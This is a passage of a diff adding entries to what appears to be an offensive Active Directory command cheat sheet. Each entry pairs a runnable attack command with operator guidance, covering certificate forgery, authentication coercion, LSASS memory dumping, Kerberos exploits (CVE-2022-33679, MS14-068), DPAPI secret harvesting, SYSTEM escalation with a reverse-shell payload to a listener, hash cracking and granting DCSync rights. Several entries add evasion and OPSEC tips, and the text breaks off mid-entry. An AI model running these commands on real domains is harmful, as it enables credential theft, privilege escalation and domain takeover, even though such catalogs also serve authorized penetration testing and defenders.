"https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-Find-Vulnerable", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-Find-Vulnerable", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "certipy find -u john@test.local -p password123 -dc-ip 10.10.10.1 -vulnerable -stdout", + "description": "Certipy's find command enumerates the AD Certificate Services environment over LDAP and RPC, collecting Enterprise CAs, published certificate templates, and their security descriptors. The -vulnerable flag filters the output to only templates and CA settings that match a known ESC misconfiguration (ESC1-ESC16), and -stdout prints a readable report to the console instead of writing BloodHound/JSON/text files. Run this first with any domain foothold to map which escalation path is available before requesting a certificate.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "ADCS", + "LDAP" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation", + "https://www.thehacker.recipes/ad/movement/adcs/certificate-templates" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-Forge-GoldenCert", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-Forge-GoldenCert", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "certipy forge -ca-pfx test-CA.pfx -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500 -out administrator_forged.pfx", + "description": "A 'golden certificate' is forged offline once the operator has extracted the Enterprise CA's own certificate and private key (via certipy ca -backup or ESC7, output as a .pfx). Certipy forge signs a brand-new certificate for any UPN with that CA key, so it is trusted by every DC in the forest. Because it never touches the CA and needs no enrollment, it is a durable persistence primitive that survives the target user's password resets. Include -sid to satisfy strong certificate mapping. Feed the forged .pfx to certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCA private key (PFX): test-CA.pfx\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775", + "mitre": [], + "requires": [ + "PFX" + ], + "services": [ + "ADCS" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ShadowCredentials", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ShadowCredentials", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Privilege Escalation" + ], + "nativeCategory": [ + "Credential Access", + "PrivEsc" + ], + "command": "certipy shadow auto -u john@test.local -p password123 -dc-ip 10.10.10.1 -account victim", + "description": "Shadow Credentials abuse write access to a target's msDS-KeyCredentialLink attribute (Key Trust). Certipy shadow auto adds an attacker-controlled key credential to the target account over LDAP, uses it to obtain a certificate via PKINIT, recovers the account's NT hash, and then removes the key credential to clean up automatically. Requires GenericWrite/GenericAll (or equivalent) over the target and a KDC that supports PKINIT. Preferred over PyWhisker when you want the full add-authenticate-restore chain in one step.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget account: victim\n\n\tDomain Controller IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP", + "Kerberos", + "ADCS" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", + "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials" + ], + "added": true + }, + { + "id": "wadcoms:Coercer-Coerce", + "toolId": "wadcoms:Coercer", + "toolName": "Coercer", + "name": "Coercer-Coerce", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Exploitation" + ], + "command": "Coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2", + "description": "Coercer is a multi-protocol authentication coercion tool that automatically walks through every known RPC coercion method (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, MS-EVEN and more) against a target and triggers the machine account to authenticate back to an attacker-controlled listener. The 'coerce' mode fires all applicable methods, making it the fastest way to obtain a machine-account NTLM authentication to feed into ntlmrelayx or krbrelayx. Requires a valid domain account by default and works well when you do not yet know which specific coercion vector (PrinterBug, PetitPotam, DFSCoerce, ShadowCoerce) is exposed. OPSEC: it is noisy, hitting many named pipes in one run.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "RPC", + "NTLM" + ], + "references": [ + "https://github.com/p0dalirius/Coercer", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/" + ], + "added": true + }, + { + "id": "wadcoms:Coercer-Scan", + "toolId": "wadcoms:Coercer", + "toolName": "Coercer", + "name": "Coercer-Scan", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "Coercer scan -u john -p password123 -d test.local -t 10.10.10.1", + "description": "Coercer's 'scan' mode enumerates which RPC coercion methods and named pipes are reachable on a target without actually completing an authentication relay, letting an operator map the exposed attack surface (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, etc.) before choosing a vector. Use it as reconnaissance to confirm a host is vulnerable and to pick the quietest single method rather than blasting all of them with coerce. Typically run with a valid domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "RPC", + "NTLM" + ], + "references": [ + "https://github.com/p0dalirius/Coercer", + "https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/" + ], + "added": true + }, + { + "id": "wadcoms:Comsvcs-MiniDump-LSASS", + "toolId": "wadcoms:Comsvcs", + "toolName": "Comsvcs", + "name": "Comsvcs-MiniDump-LSASS", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# Get the LSASS PID first: tasklist /fi \"imagename eq lsass.exe\"\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <lsass_pid> C:\\Windows\\Temp\\lsass.dmp full", + "description": "The built-in comsvcs.dll exports a MiniDump function that rundll32 can call to write a full memory dump of any process by PID, making it a living-off-the-land LSASS dumper that needs no dropped tooling. Supply the LSASS PID (find it with tasklist or Get-Process lsass), an output path, and the 'full' flag for a complete dump. It requires SYSTEM (or admin + SeDebugPrivilege); the dump is then parsed offline with pypykatz or Mimikatz. This technique is well-signatured, so treat it as noisy.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp\n\n\tLSASS PID: <lsass_pid>", + "mitre": [ + "T1003.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM", + "Kerberos" + ], + "references": [ + "https://lolbas-project.github.io/lolbas/Libraries/comsvcs/", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "added": true + }, + { + "id": "wadcoms:CVE-2022-33679-Downgrade", + "toolId": "wadcoms:CVE", + "toolName": "CVE", + "name": "CVE-2022-33679 Kerberos RC4-MD4 Downgrade", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Execution" + ], + "nativeCategory": [ + "Credential Access", + "Exploitation" + ], + "command": "# target = domain/username (AS-REP-roastable account), serverName = DC FQDN\npython3 CVE-2022-33679.py test.local/john dc.test.local -dc-ip 10.10.10.1\n\n# Use the recovered ticket\nexport KRB5CCNAME=john_dc.ccache", + "description": "CVE-2022-33679 is an unauthenticated Kerberos encryption-downgrade attack: the KDC returns AS-REP material encrypted with the legacy RC4-MD4 (etype 24) cipher for an account, and a known-plaintext weakness lets the attacker brute-force the ephemeral session key and forge a usable TGT. Bdenneu's standalone exploit targets a domain account that has 'Do not require Kerberos pre-authentication' set and an RC4 key, needing only the victim's username (no password). It writes the recovered TGT to a ccache named <user>_<server>.ccache, which can then be used for unauthenticated Kerberoasting or further access.\n\nCommand Reference:\n\n\tTarget (domain/user): test.local/john\n\n\tDC host: dc.test.local\n\n\tDC IP: 10.10.10.1\n\n\tOutput: out.ccache", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/Bdenneu/CVE-2022-33679", + "https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html", + "https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/" + ], + "added": true + }, + { + "id": "wadcoms:DFSCoerce", + "toolId": "wadcoms:DFSCoerce", + "toolName": "DFSCoerce", + "name": "DFSCoerce", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Exploitation" + ], + "command": "python3 dfscoerce.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1", + "description": "DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) RPC interface exposed on a Domain Controller (via the \\PIPE\\netdfs named pipe) to coerce the DC machine account into authenticating to an attacker-controlled host. Because the vulnerable interface lives on the DC itself, it is a reliable path to relay the DC$ authentication to ADCS or LDAP for a domain takeover. The listener is passed first, the target DC second, mirroring PetitPotam's argument order. A valid low-privileged domain account is normally required.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "RPC", + "NTLM" + ], + "references": [ + "https://github.com/Wh04m1001/DFSCoerce", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm" + ], + "added": true + }, + { + "id": "wadcoms:DonPAPI-Collect", + "toolId": "wadcoms:DonPAPI", + "toolName": "DonPAPI", + "name": "DonPAPI-Collect", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "# Mass DPAPI harvest against a host (or CIDR / target file), fetching the domain backup key\ndonpapi collect -u john -p password123 -d test.local -t 10.10.10.1 --fetch-pvk\n\n# Browse the collected loot afterward\ndonpapi gui", + "description": "DonPAPI (login-securite) mass-harvests DPAPI-protected secrets across a set of Windows hosts from Linux without dropping a binary: it remotely reads and decrypts credential blobs, saved browser passwords and cookies, Wi-Fi keys, scheduled task and vault credentials, and certificates. The collect subcommand takes standard NetExec-style auth (-u/-p, -H for hashes, -k/--aesKey for Kerberos) and a -t target list; --fetch-pvk grabs the domain backup key so user masterkeys decrypt automatically. Results land in a local database browsable afterward with donpapi gui. Requires local admin on each target and is loud at scale, so scope the target list carefully.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/login-securite/DonPAPI", + "https://www.login-securite.com/2022/03/28/donpapi/" + ], + "added": true + }, + { + "id": "wadcoms:EfsPotato-SeImpersonate", + "toolId": "wadcoms:EfsPotato", + "toolName": "EfsPotato", + "name": "EfsPotato-SeImpersonate", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Compile on the target with the bundled .NET compiler\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /nowarn:1691,618 /out:EfsPotato.exe EfsPotato.cs\n\n# Run a command as SYSTEM (optional 2nd arg picks the named pipe)\nEfsPotato.exe \"whoami\"\nEfsPotato.exe \"whoami\" 2", + "description": "EfsPotato abuses the MS-EFSRPC (Encrypting File System Remote) interface to coerce the local SYSTEM account to authenticate over a named pipe, then impersonates the token to run a command as SYSTEM. It is a single self-contained source file typically compiled on the target with csc.exe, which helps evade AV signatures on prebuilt potato binaries. The optional second argument selects the named pipe (1=lsarpc, 2=efsrpc, 3=samr, 4=lsass, 5=netlogon) to dodge partial MS-EFSRPC patches. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tPipe selector (optional): 2 = \\pipe\\efsrpc", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "RPC" + ], + "references": [ + "https://github.com/zcgonvh/EfsPotato", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" + ], + "added": true + }, + { + "id": "wadcoms:GodPotato-SeImpersonate", + "toolId": "wadcoms:GodPotato", + "toolName": "GodPotato", + "name": "GodPotato-SeImpersonate", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Run a command as NT AUTHORITY\\SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c whoami\"\n\n# Example: trigger a reverse shell payload as SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c C:\\Windows\\Temp\\rev.exe 10.10.10.2 443\"", + "description": "GodPotato abuses SeImpersonatePrivilege to escalate a service account to SYSTEM by triggering a SYSTEM RPC/DCOM authentication against a local fake OXID resolver, then impersonating the returned token. Unlike the older *Potato variants it works broadly across Windows Server 2012 R2 through 2022 and Windows 8 through 11. Pick the binary matching the installed .NET runtime (GodPotato-NET2/NET35/NET4). Requires SeImpersonatePrivilege or SeAssignPrimaryToken on the current token.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege", + "mitre": [ + "T1134.002" + ], + "requires": [ + "Shell" + ], + "services": [ + "DCOM", + "RPC" + ], + "references": [ + "https://github.com/BeichenDream/GodPotato", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato", + "https://attack.mitre.org/techniques/T1134/002/" + ], + "added": true + }, + { + "id": "wadcoms:Hashcat-ASREPRoast", + "toolId": "wadcoms:Hashcat", + "toolName": "Hashcat", + "name": "Hashcat-ASREPRoast", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# hashes.txt holds one $krb5asrep$23$user@TEST.LOCAL:... blob per account\nhashcat -m 18200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 18200 hashes.txt --show", + "description": "Accounts with 'Do not require Kerberos preauthentication' set will return an AS-REP whose encrypted part is derived from the account password. Hashcat mode 18200 cracks the RC4-HMAC (etype 23) $krb5asrep$23$ format produced by Impacket GetNPUsers.py or Rubeus asreproast. No valid domain credentials are needed to collect these, and cracking is fully offline against a wordlist.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [ + "T1558.004" + ], + "requires": [ + "Hash" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://hashcat.net/wiki/doku.php?id=example_hashes", + "https://www.thehacker.recipes/ad/movement/kerberos/asreproast", + "https://attack.mitre.org/techniques/T1558/004/" + ], + "added": true + }, + { + "id": "wadcoms:Hashcat-DCC2-mscash2", + "toolId": "wadcoms:Hashcat", + "toolName": "Hashcat", + "name": "Hashcat-DCC2-mscash2", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# hashes.txt holds one $DCC2$10240#john#<hash> line per cached account\nhashcat -m 2100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 2100 hashes.txt --show", + "description": "Domain Cached Credentials v2 (mscash2 / DCC2) are the cached logon verifiers stored on domain-joined hosts so users can log in when the DC is unreachable, recoverable with secretsdump.py or mimikatz. Hashcat mode 2100 cracks the $DCC2$iterations#username#hash format. DCC2 uses PBKDF2 (default 10240 iterations) and cannot be passed or relayed, so offline cracking is the only path to the password; expect it to be far slower than NTLM.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [ + "T1003.005" + ], + "requires": [ + "Hash" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://hashcat.net/wiki/doku.php?id=example_hashes", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz", + "https://attack.mitre.org/techniques/T1003/005/" + ], + "added": true + }, + { + "id": "wadcoms:Hashcat-Kerberoast-TGSREP", + "toolId": "wadcoms:Hashcat", + "toolName": "Hashcat", + "name": "Hashcat-Kerberoast-TGSREP", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# hashes.txt holds one $krb5tgs$23$*...*$... blob per SPN\nhashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# recover already-cracked results from the potfile\nhashcat -m 13100 hashes.txt --show", + "description": "Kerberoasting returns a TGS-REP whose encrypted portion is derived from the service account's password. Hashcat mode 13100 targets the RC4-HMAC (etype 23) $krb5tgs$23$ format produced by Impacket GetUserSPNs.py or Rubeus. Because the ticket is keyed to the account password, it can be recovered fully offline with a wordlist, no further contact with the DC and no lockout risk. This is the standard follow-up to any Kerberoast collection.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [ + "T1558.003" + ], + "requires": [ + "Hash" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://hashcat.net/wiki/doku.php?id=example_hashes", + "https://www.thehacker.recipes/ad/movement/kerberos/kerberoast", + "https://attack.mitre.org/techniques/T1558/003/" + ], + "added": true + }, + { + "id": "wadcoms:Hashcat-NetNTLMv1", + "toolId": "wadcoms:Hashcat", + "toolName": "Hashcat", + "name": "Hashcat-NetNTLMv1", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# straight dictionary crack of the NetNTLMv1 response\nhashcat -m 5500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# preferred: reverse a fixed-challenge (1122334455667788) response to the NT hash\n# format it with evilmog's ntlmv1-multi, then submit to crack.sh / crack DES locally\npython3 ntlmv1.py --ntlmv1 'john::TEST:...:...:1122334455667788'", + "description": "Legacy NetNTLMv1 responses (user::domain:LMresp:NTresp:challenge) are cracked with hashcat mode 5500. Their real value is that a NetNTLMv1 response captured against a known/forced challenge (e.g. 1122334455667788) is a DES computation over the raw NT hash, so it can be reversed to the account's NT hash rather than a password. The evilmog ntlmv1-multi tool formats the response for submission to crack.sh, which historically returned the NT hash instantly via DES rainbow tables (the public service has since been offline; the same reversal can be run locally as hashcat mode 14000 DES). The recovered NT hash then enables pass-the-hash.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [], + "requires": [ + "Hash" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://hashcat.net/wiki/doku.php?id=example_hashes", + "https://github.com/evilmog/ntlmv1-multi", + "https://crack.sh/netntlm/" + ], + "added": true + }, + { + "id": "wadcoms:Hashcat-NetNTLMv2", + "toolId": "wadcoms:Hashcat", + "toolName": "Hashcat", + "name": "Hashcat-NetNTLMv2", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# hashes.txt holds one JOHN::TEST:112233...:HMAC:blob line per capture\nhashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 5600 hashes.txt --show", + "description": "Responder, ntlmrelayx or an SMB/HTTP poisoning capture yields NetNTLMv2 challenge-response hashes in the form user::domain:challenge:HMAC:blob. Hashcat mode 5600 cracks these offline to recover the account's cleartext password. NetNTLMv2 cannot be passed-the-hash, so cracking (or relaying) is the only way to weaponise a captured response.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [ + "T1110.002" + ], + "requires": [ + "Hash" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://hashcat.net/wiki/doku.php?id=example_hashes", + "https://www.thehacker.recipes/ad/movement/ntlm/capture", + "https://attack.mitre.org/techniques/T1110/002/" + ], + "added": true + }, + { + "id": "wadcoms:Hashcat-NTLM-secretsdump", + "toolId": "wadcoms:Hashcat", + "toolName": "Hashcat", + "name": "Hashcat-NTLM-secretsdump", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# feed the full secretsdump pwdump line and let hashcat strip the user field\nhashcat -m 1000 -a 0 --username hashes.txt /usr/share/wordlists/rockyou.txt\n\n# or crack a bare NT hash\nhashcat -m 1000 -a 0 2a3de7fe356ee524cc9f3d579f2e0aa7 /usr/share/wordlists/rockyou.txt\n\nhashcat -m 1000 --username hashes.txt --show", + "description": "Impacket secretsdump.py, an NTDS.dit dump or a SAM dump yields lines of the form user:rid:lmhash:nthash:::. Hashcat mode 1000 cracks the raw NT hash to cleartext. The --username flag lets hashcat parse the full pwdump-style line and keep the account association in the output. Cracking is optional for lateral movement (NT hashes can be passed) but is needed to recover reusable passwords and to spot password reuse.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tNT Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [ + "T1003.002" + ], + "requires": [ + "Hash" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://hashcat.net/wiki/doku.php?id=example_hashes", + "https://github.com/fortra/impacket/blob/master/examples/secretsdump.py", + "https://attack.mitre.org/techniques/T1003/002/" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-dacledit-DCSync", + "toolId": "wadcoms:Impacket-dacledit", + "toolName": "Impacket-dacledit", + "name": "Impacket-dacledit-DCSync", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Persistence", + "Credential Access" + ], + "nativeCategory": [ + "PrivEsc", + "Persistence", + "Credential Access" + ], + "command": "# Grant john DCSync rights on the domain object\ndacledit.py -action 'write' -rights 'DCSync' -principal 'john' -target-dn 'DC=test,DC=local' -dc-ip 10.10.10.1 'test.local/john:password123'", + "description": "Impacket's dacledit.py reads and modifies the DACL of an Active Directory object over LDAP. With `-action write -rights DCSync` against the domain naming context it grants a principal the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, enabling that principal to perform a DCSync and dump every domain hash. This is a classic ACL-based domain-privilege-escalation and persistence primitive; it requires WriteDacl over the domain object. Back up the DACL with `-action read` first so you can restore it.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tGranted principal: john", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://www.thehacker.recipes/ad/movement/dacl/grant-rights", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-DescribeTicket", + "toolId": "wadcoms:Impacket-describeTicket", + "toolName": "Impacket-describeTicket", + "name": "Impacket-DescribeTicket", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "# Describe a ticket offline (envelope, flags, and the PAC where it can be read)\ndescribeTicket.py out.ccache", + "description": "Impacket describeTicket.py parses a Kerberos ticket file (ccache or kirbi) and prints its fields, and when given the relevant key it decrypts the enc-part and dumps the PAC, exposing the user, RID, group memberships and PAC signatures. It is the Linux counterpart to Rubeus describe and is useful for validating forged or captured tickets before use. Runs fully offline.\n\nCommand Reference:\n\n\tTicket file: out.ccache", + "mitre": [], + "requires": [ + "TGT" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-FindDelegation", + "toolId": "wadcoms:Impacket-findDelegation", + "toolName": "Impacket-findDelegation", + "name": "Impacket-FindDelegation", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Enumerate all delegation relationships in the domain\nfindDelegation.py test.local/john:password123 -dc-ip 10.10.10.1", + "description": "Impacket findDelegation.py enumerates every delegation relationship in the domain over LDAP: unconstrained, constrained (S4U2Proxy allowed-to-delegate-to targets) and resource-based constrained delegation. The output identifies accounts and computers that can be abused for privilege escalation and lateral movement via Kerberos delegation. Requires any valid domain credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "Kerberos", + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://www.thehacker.recipes/ad/movement/kerberos/delegations", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-GetUserSPNs-NoPreauth", + "toolId": "wadcoms:Impacket-GetUserSPNs", + "toolName": "Impacket-GetUserSPNs", + "name": "Impacket-GetUserSPNs-NoPreauth", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Credential Access" + ], + "nativeCategory": [ + "Enumeration", + "Credential Access" + ], + "command": "# 'john' is an account with Kerberos pre-auth disabled; usernames.txt lists SPN accounts to roast\nGetUserSPNs.py -no-preauth john -usersfile usernames.txt -dc-host dc.test.local test.local/", + "description": "GetUserSPNs.py with -no-preauth performs Kerberoasting without any valid domain credentials. It leverages an account that has Kerberos pre-authentication disabled (an AS-REP roastable account): by altering the sname in a crafted KRB_AS_REQ, the KDC returns a service ticket instead of a TGT, encrypted with the target service account's key. Because you cannot query LDAP for SPNs without creds, you must supply candidate service-account names with -usersfile. The resulting TGS hashes are cracked offline. You only need the name of one pre-auth-disabled account plus a list of accounts to roast.\n\nCommand Reference:\n\n\tNo_Creds (name of an AS-REP roastable account: john)\n\tCandidate accounts file: usernames.txt\n\tDomain: test.local\n\tDomain Controller host: dc.test.local", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "Kerberos", + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://swarm.ptsecurity.com/kerberoasting-without-spns/", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-GoldenPac", + "toolId": "wadcoms:Impacket-goldenPac", + "toolName": "Impacket-goldenPac", + "name": "Impacket-GoldenPac", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution", + "Lateral Movement" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation", + "Lateral Movement" + ], + "command": "# Exploit MS14-068 to gain SYSTEM on an unpatched DC\ngoldenPac.py test.local/john:password123@dc.test.local", + "description": "Impacket goldenPac.py exploits MS14-068 (CVE-2014-6324): on an unpatched domain controller the PAC signature validation can be bypassed, letting an ordinary domain user forge a TGT claiming Domain Admin membership without the krbtgt key. The script builds the forged PAC, obtains a privileged ticket and then executes a command (PSEXEC-style) on the target DC. Only affects DCs missing the 2014 patch, but remains relevant against legacy lab and CTF environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller host: dc.test.local", + "mitre": [ + "T1558" + ], + "requires": [ + "Username", + "Password" + ], + "services": [ + "Kerberos", + "SMB" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://github.com/fortra/impacket/blob/master/examples/goldenPac.py", + "https://attack.mitre.org/techniques/T1558/" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-MSSQLClient", + "toolId": "wadcoms:Impacket-mssqlclient", + "toolName": "Impacket-mssqlclient", + "name": "Impacket-MSSQLClient", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + 